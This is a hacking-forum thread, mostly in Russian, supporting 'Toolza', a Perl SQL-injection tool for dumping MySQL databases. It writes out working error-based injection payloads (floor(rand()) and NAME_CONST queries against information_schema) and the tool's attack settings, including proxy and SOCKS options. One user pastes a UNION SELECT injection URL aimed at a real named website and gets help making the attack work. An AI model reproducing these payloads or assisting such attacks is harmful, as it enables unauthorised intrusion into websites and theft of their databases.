прошу добавит фунцию типа select ... from ... where table_shema... тоесть не тока с текушего бд но и от остальных
в MySQL уже давным-давно добавлено update: NAME_CONST - get DB-names from information_schema.schemata NAME_CONST - get tables from DB-name NAME_CONST - get column_name from tables from DB-name
Pashkela, прога как то странно себя ведет когда в нескольких базах уязвимого сайта есть таблицы с одним и тем же названием...тулза дампит данные только из какой-то одной...возможность выбора отсутствует... З.Ы переход на gui всё-таки не планируется?
синтаксис такой ИМЯ_БД.ИМЯ_ТАБЛИЦЫ - и будет дампить откуда надо, если речь про пункт 7 когда спросит Mysql=>5 если уже есть имя БД, то надо выбрать 0 (нет), чтобы не переопределяло имя базы (делается автоматически) gui не планируется UPDATE (17.02.2010): устранение серьезных багов по всему коду, код стал более стабильный и универсальный, перекачать в первом посте
Pashkela, можешь переделать алгоритм сканера сайтов - чтобы он проходил по какому-то несуществующему адресу, тем самым узнавая дефолтную 404 страницу для сканируемого сайта, а затем уже сравнивал с нею всё остальное...тогда и файл с ошибками не нужен будет...
update: Для всех режимов работы - поддержка HTTPS+Authorization сделано на IO::Socket::SSL UBUNTU: sudo apt-get install libio-socket-ssl-perl WIN: install Net::SSLeay and IO::Socket::SSL + раскоментировать строчку 48 новые переменные: $https_mode_auth = 1; # 1 - если нужна авторизация, 0 - нет $https_auth_script_path = "/login.php"; # путь до скрипта авторизации (начинается со слеша) $https_auth_post_data = "username=admin&passwd=sex"; # логин, пароль, название полей и etc., взять можно из Tamper Data (FireFox plugin) при авторизации на ресурсе автоматическое распознавание url, если https и авторегистрация, если есть данные
update: MySql inj floor(rand()): Названо просто от балды, еще одна альтернатива Blind Mysql injection, но уже для 4.1<=Mysql=>5, т.к. использует стандартные функции для старых версий (можно сказать альтернатива name_const), основано на вызове той же ошибки Duplicate - Многопоточный - Post/Get/Cookies/Proxy & etc. - Все те же возможности, что и при обычной скуле + та же скорость скуля: Code: http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+ переменные в скрипте: Code: $f_table = "information_schema.tables"; # default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here $f_url = "http://example.com/?id=1+or(1,2)="; # url $f_plus = "+"; # %20,%2b & etc. $f_filtr = "--+"; # close SQL PS: Приведу еще один пример, некоторые просто не вполне понимают возможности: скуля: Code: http://example.com/?id=(select+1+from+(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)a)--+ переменные в скрипте: Code: $f_table = "information_schema.tables"; # default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here $f_url = "http://example.com/?id=(select+1+from+"; # url $f_plus = "+"; # %20,%2b & etc. $f_filtr = "a)--+"; # close SQL [1] floor(rand()) - system information\n"; [2] floor(rand()) - get DB-names from information_schema.schemata\n"; [3] floor(rand()) - get tables from DB-name\n"; [4] floor(rand()) - get column_name from tables from DB-name\n"; [5] floor(rand()) - get tables from information_schema (current DB)\n"; [6] floor(rand()) - get column_name from table (current DB)\n"; [7] floor(rand()) - get data from columns\n"; [8] floor(rand()) - Mysql4 inj brute tables and columns\n"; теперь с blind mysql4 можно работать как с обычной скулей Обновления в первом посте темы как обычно PS: + исправление мелких багов update 28.02.2010 - фикс багов
вообще то на данный момент самый лучшый прога для слива бд. Жал что без GUI хотя бы до запуска самого дампа надо сделать интерфейс для настройки. Это реализовал кто то на World Fastest MD5 cracker BarsWF написав GUI (BarsWF launcher) правда та прога не на перле(знаю что оч гемор написать GUI для перл) но все таки по теме привел пример. Кстати sql_ocb_public от ачата тоже с GUI реализовано ))
Pashkela бро пересмотри на тулзе функцию name_const и floor rand у обеих все норм выводит таблы но когда дело дойдет до колонок то придется по одному выводит а инфо с колонок а не несколько например user_id,username сразу не выводит
hello i want to injection in mysql vulnerable site http://www.milliontreeproject.co.uk/retailer.php?catid=-1+UNION+SELECT+1,2,3 and 2 columns is printable field i am trying to get information of this site through Toolza i edit 1 line in toolza.pl i edit like this ######################################################################################################################################### ## Основные настройки MySQL - вместо принтабельного поля поставьте " ^ " |MySql Basic options - print " ^ " instead of printable field # ######################################################################################################################################### $source_sql = "http://www.milliontreeproject.co.uk/retailer.php?catid=-1+UNION+SELECT+1,^,3"; $filtr = "--"; # close SQL $plus = "+"; # /**/,%20,%2b & etc. $limit = 0; # 0 - no limit; 1 - limit+0,1; 2 - limit+1,1 $unhex = 0; # unhex(hex(DATA))); 0 - disable; 1 - enable $aes = 0; # AES_DECRYPT(AES_ENCRYPT(DATA),x071),x071); 0 - disable; 1 - enable $aes_key = "0x71"; # AES key and when i run toolza.pl and want to get information it get nothing and give like this only system information: Request method - Post Threads - 10 proxy - no saved in z_www.milliontreeproject.co.uk.txt why i am not getting information ??? please help me thank you
There is some trouble with parsing page via sockets, thanks for bug report, so new parameter in the script in global settings: $get_method = 1; # 0 - via IO::Socket, 1 - via LWP::Simple - if can't get DATA but be careful, proxies, socks are not supported in this case and only GET method supported download script from first post PS: $filtr = ""; # close SQL doesn't matter in the given concrete case, but be attentive
Hi can you please tell me where is download script from first post ??? and where will i put this line ($get_method = 1; # 0 - via IO::Socket, 1 - via LWP::Simple) in global settings for all modes ########################################################################## ## Глобальные настройки для всех режимов | Global settings for all modes ## ########################################################################### $method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET $use_proxy = 0; # 0 - без прокси; 1 - c прокси | 1 -Use proxy; 0 - No proxy $proxy = "proxy.txt"; # Файл с проксями | Proxy file $use_socks = 0; # 0 - без socks; 1 - c socks | 1 -Use socks; 0 - No socks $socks_file = "socks.txt";# Файл с SOCKS | SOCKS file (SOCKS4-5 supported, no authorization) $kol_threads = 10; # Кол-во потоков, рекомендуется -10 | Number of threads - 10 recommended $timeout = 10; # Таймаут в секундах | Timeout in seconds $cookie = ""; # Если кук нет - поставить "" | If no coockie set "" $https_mode_auth = 1; # 1 - whith authorization, 0 - no $https_auth_script_path = "/signin.php"; $https_auth_post_data = "uname=watltd&passwd=drowssap&Submit=Sign+In"; $referer = "http://google.com"; # Реферер, если нет поставить "" | If no referer set "" $user_agent = "Opera/9.25 (Windows NT 6.0; U; en)"; # Юзер агент, если нет поставить "" | If no user agent set "" $http_protocol = 1; # 0 - HTTP/1.0; 1 - HTTP/1.1; Default - 1 $pause = 0; # Пауза между запросами в секундах | Pause between requests in seconds Thank you
